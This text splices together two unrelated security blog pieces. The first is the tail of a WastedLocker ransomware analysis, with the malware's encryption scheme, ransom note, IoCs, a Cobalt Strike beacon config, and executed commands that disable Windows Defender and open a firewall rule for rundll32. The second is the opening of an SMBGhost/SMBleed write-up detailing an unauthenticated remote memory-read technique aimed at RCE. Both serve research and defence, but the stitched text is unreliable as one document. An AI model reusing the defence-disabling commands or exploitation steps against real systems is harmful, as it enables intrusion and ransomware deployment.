UNCAsIntranet Sets this key to 0
AutoDetect Sets this key to 1
Table 2 – Registry keys

The above modifications apply to both 32-bit and 64-bit systems and is possibly done to ensure that the ransomware can access remote drives. However, a bug is included in the architecture identification code. The ransomware authors use a well-known method to identify the operating system architecture. The ransomware reads the memory address 0x7FFE0300 (KUSER_SHARED_DATA) and checks if the pointer is zero. If it is then the 32-bit process of the ransomware is running in a Windows 64-bit host (Figure 2). The issue is that this does not work on Windows 10 systems.

Figure 2: Decompilation showing method used to identify operating system architecture

Additionally, WastedLocker chooses a random name from a generated name list in order to generate filename or service names. The ransomware creates this list by reading the registry keys stored in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control and then separates their names whenever a capital letter is found. For example, the registry key AppReadiness will be separated to two words, App and Readiness.

4.4 Strings Encryption

The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware’s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware’s compilation timestamp.

The code’s authors use an interesting method to locate the encrypted strings related to the encryption process. To locate one of them, the ransomware calculates a checksum that is looked up in the encrypted strings table. The checksum is derived from both a constant value that is unique to each string and a fixed value, which are bitwise XORed. The encrypted strings table consists of a struct like shown below for each string.

struct ransomware_string
{
WORD total_size; // string_length + checksum + ransom_string
WORD string_length;
DWORD Checksum; 
BYTE[string_length] ransom_string;
};

4.5 Encryption Process

The encryption process is quite straightforward. The ransomware targets the following drive types:

  • Removable
  • Fixed
  • Shared
  • Remote

Instead of including a list of extension targets, WastedLocker includes a list of directories and extensions to exclude from the encryption process. Files with a size less than 10 bytes are also ignored and in case of a large file, the ransomware encrypts them in blocks of 64MB.

Once a drive is found, the ransomware starts searching for and encrypting files. Each file is encrypted using the AES algorithm with a newly generated AES key and IV (256-bit in CBC mode) for each file. The AES key and IV are encrypted with an embedded public RSA key (4096 bits). The RSA encrypted output of key material is converted to base64 and then stored into the ransom note.

For each encrypted file, the ransomware creates an additional file that includes the ransomware note. The encrypted file’s extension is set according to the targeted organisations name along with the prefix wasted (hence the name we have gave to this ransomware). For example, test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note). The ransomware note and the list of excluded directories and extensions is available in the Appendix. Finally, once the encryption of each file has been completed, the ransomware updates the log file with the following information:

  • Number of targeted files
  • Number of files which were encrypted
  • Number of files which were not encrypted due to access rights issues

4.6 WastedLocker Decrypter

During our analysis, we managed to identify a decrypter for WastedLocker. The decrypter requires administrator privileges and similarl to the encryption process, it reports the number of files which were successfully decrypted (Figure 3).

Figure 3: Command line output of the decrypter of WastedLocker

References

  1. hxxps://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
  2. hxxps://github.com/hfiref0x/UACME
  3. hxxps://github.com/TheWover/donut/

Appendix

Ransom note

*ORGANIZATION_NAME*

YOUR NETWORK IS ENCRYPTED NOW

USE *EMAIL1* | *EMAIL2* TO GET THE PRICE FOR YOUR DATA

DO NOT GIVE THIS EMAIL TO 3RD PARTIES

DO NOT RENAME OR MOVE THE FILE

THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:
[begin_key]*[end_key]
KEEP IT

Excluded extensions (in addition to orgnamewasted and orgnamewasted_info)

*\ntldr
*.386
*.adv
*.ani
*.bak
*.bat
*.bin
*.cab
*.cmd
*.com
*.cpl
*.cur
*.dat
*.diagcab
*.diagcfg
*.dll
*.drv
*.exe
*.hlp
*.hta
*.icl
*.icns
*.ics
*.idx
*.ini
*.key
*.lnk
*.mod
*.msc
*.msi
*.msp
*.msstyles
*.msu
*.nls
*.nomedia
*.ocx
*.ps1
*.rom
*.rtp
*.scr
*.sdi
*.shs
*.sys
*.theme
*.themepack
*.wim
*.wpx
*\bootmgr
*\grldr

Excluded directories

*\$recycle.bin*
*\appdata*
*\bin*
*\boot*
*\caches*
*\dev*
*\etc*
*\initdr*
*\lib*
*\programdata*
*\run*
*\sbin*
*\sys*
*\system volume information*
*\users\all users*
*\var*
*\vmlinuz*
*\webcache*
*\windowsapps*
c:\program files (x86)*
c:\program files*
c:\programdata*
c:\recovery*
c:\users\ %USERNAME%\appdata\local\temp*
c:\users\ %USERNAME%\appdata\roaming*
c:\windows*

IoCs

IoCs related to targeted ransomware attacks are a generally misunderstood concept in the case of targeted ransomware. Each ransomware victim has a custom build configured or compiled for them and so the knowing the specific hashes used against historic victims does not provide any protection at all. Even if behavioural patterns of the ransomware or network related indicators of the ransomware stage are given (should they exist), it is arguable whether detection of the attack at that stage would allow prevention of the actual attack. We do include known ransomware hashes here; however, please note that these are for RESEARCH PURPOSES ONLY. Blocking files based on these file attributes in any endpoint protection product will not provide any value.


At Fox-IT we focus mainly on detection of the initial stages of such attacks (such as the initial stage of infection) by detecting the various methods of infection delivery as well as the lateral movement stage which typically involves scanning, exploitation and/or credential dumping. Providing these IoCs to the wider public would, however, be counterproductive as the threat actors would simply change these methods or work around the indicators. However, we have included some of them to provide historical as well as current protection or detection against this particular threat, and provide a better understanding of this threat actor. It is also hoped this information will help other organisations to conduct further research into this particular threat.

CobaltStrike
This particular set of domains is used as C&C by the group for CobaltStrike lateral movement activity, using a custom loader, Note that in 2020 the group has completely switched to using CobaltStrike and is no longer using the Empire PowerShell framework as it is no longer being updated by the original creators.

CobaltStrike C&C Domains

adsmarketart.com
advancedanalysis.be
advertstv.com
amazingdonutco.com
cofeedback.com
consultane.com
dns.proactiveads.be
mwebsoft.com
rostraffic.com
traffichi.com
typiconsult.com
websitelistbuilder.com

CobaltStrike Beacon config

SETTING_PROTOCOL: short: 8 (DNS: 0, SSL: 1)
SETTING_PORT: short: 443
SETTING_SLEEPTIME: int: 45000
SETTING_MAXGET: int: 1403644
SETTING_JITTER: short: 37
SETTING_MAXDNS: short: 255
SETTING_PUBKEY: ''
SETTING_PUBKEY SHA256: 14f2890a18656e4e766aded0a2267ad1c08a9db11e0e5df34054f6d8de749fe7
ptr SETTING_DOMAINS: websitelistbuilder.com,/jquery-3.3.1.min.js
ptr SETTING_USERAGENT: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
ptr SETTING_SUBMITURI: /jquery-3.3.2.min.js
SETTINGS_C2_RECOVER:
    print: True
    append: 1522
    prepend: 84
    prepend: 3931
    base64url: True
    mask: True
SETTING_C2_REQUEST (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer: http://code.jquery.com/
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   BASE64URL: True
   PREPEND: __cfduid=
   HEADER: Cookie
SETTING_C2_POSTTREQ (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer: http://code.jquery.com/
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   MASK: True
   BASE64URL: True
   PARAMETER: __cfduid
   BUILD: output
   MASK: True
   BASE64URL: True
   PRINT: True
ptr DEPRECATED_SETTING_SPAWNTO: 
ptr SETTING_SPAWNTO_X86: %windir%\syswow64\rundll32.exe
ptr SETTING_SPAWNTO_X64: %windir%\sysnative\rundll32.exe
ptr SETTING_PIPENAME: 
SETTING_CRYPTO_SCHEME: short: 0 (CRYPTO_LICENSED_PRODUCT)
SETTING_DNS_IDLE: int: 1249756273
SETTING_DNS_SLEEP: int: 0
ptr SETTING_C2_VERB_GET: GET
ptr SETTING_C2_VERB_POST: POST
SETTING_C2_CHUNK_POST: int: 0
SETTING_WATERMARK: int: 305419896 (0x12345678)
SETTING_CLEANUP: short: 1
SETTING_CFG_CAUTION: short: 0
ptr SETTING_HOST_HEADER: 
SETTING_HTTP_NO_COOKIES: short: 1
SETTING_PROXY_BEHAVIOR: short: 2
SETTING_EXIT_FUNK: short: 0
SETTING_KILLDATE: int: 0
SETTING_GARGLE_NOOK: int: 154122
ptr SETTING_GARGLE_SECTIONS: '`\x02\x00Q\xfd\x02\x00\x00\x00\x03\x00\xc0\xa0\x03\x00\x00\xb0\x03\x000\xce\x03'
SETTING_PROCINJ_PERMS_I: short: 4
SETTING_PROCINJ_PERMS: short: 32
SETTING_PROCINJ_MINALLOC: int: 17500
ptr SETTING_PROCINJ_TRANSFORM_X86: '\x02\x90\x90'
ptr SETTING_PROCINJ_TRANSFORM_X64: '\x02\x90\x90'
ptr SETTING_PROCINJ_STUB: *p?'??7???]
ptr SETTING_PROCINJ_EXECUTE: BntdllRtlUserThreadStart
SETTING_PROCINJ_ALLOCATOR: short: 1
Deduced metadata:
 WANTDNS: False
 SSL: True
 MAX ENUM: 55
 Version: CobaltStrike v4.0 (Dec 5, 2019)

Custom CobaltStrike loader samples (sha256 hashes):

2f72550c99a297558235caa97d025054f70a276283998d9686c282612ebdbea0
389f2000a22e839ddafb28d9cf522b0b71e303e0ae89e5fc2cd5b53ae9256848
3dfb4e7ca12b7176a0cf12edce288b26a970339e6529a0b2dad7114bba0e16c3
714e0ed61b0ae779af573dce32cbc4d70d23ca6cfe117b63f53ed3627d121feb
810576224c148d673f47409a34bd8c7f743295d536f6d8e95f22ac278852a45f
83710bbb9d8d1cf68b425f52f2fb29d5ebbbd05952b60fb3f09e609dfcf1976c
91e18e5e048b39dfc8d250ae54471249d59c637e7a85981ab0c81cf5a4b8482d
adabf8c1798432b766260ac42ccdd78e0a4712384618a2fc2e3695ff975b0246
b0354649de6183d455a454956c008eb4dec093141af5866cc9ba7b314789844d
bc1c5fecadc752001826b736810713a86cfa64979b3420ab63fe97ba7407f068
c781c56d8c8daedbed9a15fb2ece165b96fdda1a85d3beeba6bb3bc23e917c90
c7cde31daa7f5d0923f9c7591378b4992765eac12efa75c1baaaefa5f6bdb2b6
f093b0006ef5ac52aa1d51fee705aa3b7b10a6af2acb4019b7bc16da4cabb5a1

.NET injector (Donut) (sha256 hash):

6088e7131b1b146a8e573c096386ff36b19bfad74c881ca68eda29bd4cea3339

Gozi ISFB v2
This particular set contains C&C domains, bot version, Group ID, RSA key and Serpent encryption keys for 2 Gozi variants used for persistence in victim networks during 2020.

Gozi C&C Domains

bettyware.xyz
celebratering.xyz
fakeframes.xyz
gadgetops.xyz
hotphonecall.xyz
justbesarnia.xyz
kordelservers.xyz
tritravlife.xyz
veisllc.xyz
wineguroo.xyz

Gozi versions

217119
217123

Gozi Group ID

30000

Gozi RSA key

00020000BEA9877343AD9F6EA8E122A5A540C071E96AB5E0C8D73991BFACB8D7867125966C60153EB1315F07FD8B276D7A45A5404642CC9D1F79357452BB84EDAA7CE21300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001

Gozi serpent network encryption keys:

8EzkwaSgkg565AyQ
eptDZELKvZUseoAH
GbdG3H7PgSVEme2r
RQ5btM2UfoCHAMKN

Gozi samples (sha256 hashes)

5706e1b595a9b7397ff923223a6bc4e4359e7b1292eaed5e4517adc65208b94b
ba71ddcab00697f42ccc7fc67c7a4fccb92f6b06ad02593a972d3beb8c01f723
c20292af49b1f51fac1de7fd4b5408ed053e3ebfcb4f0566a2d4e7fafadde757
cf744b04076cd5ee456c956d95235b68c2ec3e2f221329c45eac96f97974720a

WastedLocker samples (sha256 hashes)

5cd04805f9753ca08b82e88c27bf5426d1d356bb26b281885573051048911367
887aac61771af200f7e58bf0d02cb96d9befa11deda4e448f0a700ccb186ce9d
8897db876553f942b2eb4005f8475a232bafb82a50ca7761a621842e894a3d80
bcdac1a2b67e2b47f8129814dca3bcf7d55404757eb09f1c3103f57da3153ec8
e3bf41de3a7edf556d43b6196652aa036e48a602bb3f7c98af9dae992222a8eb
ed0632acb266a4ec3f51dd803c8025bccd654e53c64eb613e203c590897079b3

The following IoCs are specifically related to the crypter used by Evil Corp, which we refer to as CryptOne. Given that CryptOne is used by more malware families and variations than just those related to Evil Corp it is likely that CryptOne is a third party service.

List of metadata extracted from Gozi ISFB v3 samples

Bot version 3.00.854
RSA key 00040000C3DC07D4E1AC941077214371F45B5FDDDF389654D0851D66809BC989ABA850C27D3718D195EE1388087F21FFE759184C185959D1AB5DBC40C3D94C88F46FE8AA1CA94CB07CF110866559456F9DF6F1EAE9C3002F1A257A2F99E3EB3EF6C727516BA65CE56C82E23CBBE87E1EE95F34DD7DC0D07B7C1F57B71BC49DC35DEB2CAB0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001
Group IDs 202004081
202004091
202004141
202004231
202005041
80000
Serpent keys 1qzRaTGYO5dpREYI
8JbpEEfNYPlYoAN4
dLwZ7QwI57AkzZEl
UEwFH6L9iBbdJxAf
uIIXQ4B05dT8AytD
vuARb2EPotEtfAX2
Z6fiC4XCvQmfkgua
C&Cs hxxps://devicelease.xyz
hxxps://guiapocos.xyz
hxxps://ludwoodgroup.xyz
hxxps://respondcritique.xyz
hxxps://triomigratio.xyz
hxxps://uplandcaraudio.xyz
hxxps://woofwoofacademy.xyz

ZLoader (MD5: fb95561e8ed7289d015e945ad470e6db)

RC4 key das32hfkAN3R2TCS
Botnet name pref
Nonce 0x7
Static config RC4 key kyqvkjlpclbcnagbhiwo
Version 1.2.22.0
C&Cs hxxp://advokat-hodonin.info/gate.php
hxxp://penaz.info/gate.php
Binary Distribution hxxp://paiolets.com/install.exe

Netwalker ransomware (MD5: 198b2443827f771f216cd8463c25c5d8)

SmokeLoader (MD5: 2143d279be8d1bb4110b7ebe8dc3afbc)

RC4 send 0x69A84992
RC4 recv 0x5D7C6D5B
C&Cs hxxp://flablenitev.site/index.php
hxxp://lendojekam.xyz/index.php
hxxp://lgrarcosbann.club/index.php
hxxp://lpequdeliren.fun/index.php
hxxp://transvil2.xyz/index.php
Binary Distribution hxxps://szn.services/1.exe
hxxps://utenti.info/1.exe
hxxps://utenti.live/1.exe

SecTool checker (MD5: b33753fae7bd1e68e0b1cc712b5fb867)

We have found a sample crypted by the CryptOne crypter as used by WastedLocker, which is capable of detecting/disabling a list of security software. It is believed that this tool is used during ransomware deployment, but we have no specific evidence that it was used by Evil Corp. However in the past we have seen execution of commands listed in the tool to disable Microsoft Windows Defender.

List of Registry Keys checked Software\ESET
SYSTEM\ControlSet001\Services\MBAMService
List of Mutex checked 00082fbb-a419-43f4-bd80-e3631ebbf4c8
069e4409-bd54-4a1f-8e37-49da2cf6a537
0ca9a8d3-01bf-4f9e-bfc7-7eb51e67e0c4
12a2c0fc-00d2-4614-b4ae-c18eb500a088
138be83c-2a52-4c31-9ee8-bfd4eac53d72
15417794-7485-46f6-9965-d34730ea0f48
168cb052-69eb-45be-be07-d4f323dc67d6
16ed8dab-ee6b-44ea-8cea-31c66d6864b9
172821eb-729d-4307-a56f-63063b2677de
17689d7a-89bf-4e2a-a49c-9e4e5a51a9d7
197a1689-8bb1-4fcd-80e9-32b86e3751f5
1a379834-6135-41e7-9cf7-e79a9f705fbc
1cce886d-1841-4e18-963b-15f2e90a3c44
1e8e5806-2e99-4002-b62c-7a78a6641874
1f1769de-42fa-4883-b37c-f0de488de557
240187f4-b097-4a3c-a6fa-2ca5b1e0b373
25f07256-3b46-4531-aa3e-e1729d9aa7cb
274f61dd-3fed-4bfe-9aa6-8a012339a41f
27a0f05f-41fa-43f1-86b9-7e48bde3d716
2a942be2-9252-4d60-9483-3651a92192a5
2c0c5f0d-6ad7-4c97-b1a8-2c706d03a4f8
39309b80-cef5-4ce1-b215-0719723c4c30
3c159c86-0e90-47d1-ad37-788c00ba2948
3f78ca48-011c-4ffb-abfa-c9f659e4a820
3ffd4715-4991-4bc8-9c51-2e3aeb6e737e
3G1S91V5ZA5fB56W
48353b4f-51f9-4961-bcc1-c8d5163a8978
4d6a57e9-e692-4da2-8ba8-adb25645e4b8
4e1ac580-d3cf-4961-81eb-072dff249c17
4e5e7d5e-a1fe-4de7-ad53-5f4aaecd7402
55731fe5-97ad-47dc-953f-37a8aca1451b
5962654a-a395-4714-96f2-2419ab2172bf
5e76294a-2787-4ae2-9ddc-b792b0c45ec2
60f8896b-a437-4e79-9e29-96522ca88c4c
62e64ec9-d662-4595-bf77-634764dcf810
67f4e0eb-54cc-4779-b3c3-fe277c8478ae
6b264507-ba91-4d85-86c9-1e827315cbe0
722cbc3c-acc8-4296-a8dd-7d06e5ca7d57
7eb5ccec-3fd7-4826-b681-02a6129aa108
81baf7c7-3010-49b9-9f56-d53fca06c04d
85e6784c-7904-41ee-99b4-8b286e19da70
8AZB70HDFK0WOZIZ
8f1a37f6-9cff-447e-a00c-cb19512de134
9b765102-98e7-43e2-a003-f8cbdfab8a64
9f093bf8-480b-414c-a8e8-5d9c6da83576
9f7e0dc2-bc5c-497e-aa70-f8072e71550c
ab7d92f2-968a-461e-9da6-e569dedb0a91
ARScenes
ASUSNet20
ATYNKAJP30Z9AQ
b22d1dd8-e3ea-4764-ba9b-0ebf41fddee7
b3e32042-d969-43d1-b20c-bcf8da5ba436
beb41e13-5e33-450f-a9c5-3e5a382d224d
BiosChecksumChecker
bitcoreguard
BlueEye
c3c2a8b3-fc8a-4fe3-8f24-6f2a757a5012
ca1b68fd-56d5-4355-94b2-ed6ab0857890
CBKZiOPASRHKL
CDNetStreamer2.r05
cf3573d5-bf4f-4094-bbea-ced8efde2257
China1839099
China4150039
CryptoMaxima
D1JozWrldD
d86a1229-2cb7-409b-a3de-5366eec3db90
d8ba5865-ac00-4df1-8437-eb144077e031
dad17f2e-5f30-4313-b1c3-5ae8c2149757
dec0f5aa-1fd1-458f-916c-693887610891
e3024a8f-3f2b-4e06-ac36-0997c1090d00
ed3a7d1d-ed6f-4c8f-86d4-44dcde3b32f8
f1e7974a-30e1-423c-9745-bbb7ff7dbf71
f378f238-6503-4544-8e43-cbe4bbf3615e
f967041f-20dd-4d31-a34a-f5e04bdfdf7b
FamilyWeekend
fbac80bd-ba6a-4cd5-92d9-3a31a87f7af6
fda765a3-b5a2-4417-9097-3b18dc6fe6fb
fe711d65-f31a-4c22-a12f-cec65d231941
FixLCD
FMPsDSCV0l
FoloDrite
Hk4kKLL0ZAF8a
HTTPBalancer_v2.15
I0N8129AZR1A
ImageCreator_v4.2
InRAMQueue
IntelBIOSReader
IwS01003993
JerkPatrol
JKLSXX1ZA1QRLER
KDOWEtRVAB
LenovoSuite
MaverickMeerkat
MDISequencer
MK5Cheats
MLIXNJ9AEGPSE
MLIXNJAEGPSE
MovieFinder
N800HANOI
NattyNarwhal
NeoNetPlasma
NeonRhythmbox
NetRegistry
NetworkLighter
NHO9AZB7HDK0WAZMM
NMOZAQcxzER
NNDRIOZ8933
OMXBJSJ3WA1ZIN
OneiricOcelot
OnlineShopFinder
P79zA00FfF3
PCV5ATULCN
PJOQT7WD1SAOM
PrecisePangolin
PSHZ73VLLOAFB
QOSUser2.r10
QuantalQuetzal
RaringRingtail
RaspberryManualViewer
RedParrot
RouteMatrix
SoloWrite
sqlcasheddbm
SSDOptimizerV13
StreamCoder1.0
Tropic819331
UEFIConfig
UtopicUnicorn
VHO9AZB7HDK0WAZMM
VideoBind
VirginPoint
VirtualDesktopKeeper
VirtualPrinterDriver
VividVervet
VRK1AlIXBJDA5U3A
WinDuplicity
WireDefender
wwallmutex
Commands executed C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll
 
C:\Windows\System32\netsh.exe advfirewall firewall add rule name=”Rundll32″ dir=out action=allow protocol=any program=”C:\Windows\system32\rundll32.exe”

SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

15 June 2020 at 17:06
SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

Introduction

In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

Aiming for RCE

Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in the modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows to leak parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for an unauthenticated RCE exploitation, the first thing we looked for is a way to read memory unauthenticated.

Diving into SMB

Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.

The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.

After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:

SMB2 NEGOTIATE → SMB2 SESSION_SETUP → SMB2 SESSION_SETUP

If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.

We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:

  • The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
  • The subsequent commands, until authentication completes successfully, must be SMB2 SESSION_SETUP. That is unless anonymous access to named pipes or shares is not restricted, and it is by default.

Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.

A closer look at SMB2 SESSION_SETUP

As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.

The NTLM Authenticate message

After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLM2 V2 Response structure. It’s a  variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) parameter is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks are verifying the AvPairs field.

The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.

AvPairs inside the SMB2 packet.

The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.

At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:

The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:

  • length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
  • length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.

According to the server response we can deduce the answer to our question.

So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.

Observation #1: Lookaside lists

As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.

The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.

Observation #2: Failing the decompression

Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):

In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:

Back to the NTLM Authenticate message

We can use the above observations to make our technique work by using two steps:

  1. Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
  2. Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.

This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.

Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.

Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.

Overcoming the offset limitation

Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.

Address leak POC

You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.

A different approach – decompression

While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.

Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.

We accomplished that by sending a valid packed which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):

There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:

  • length <= y: In this case the whole compressed block will consist out of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
  • length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.

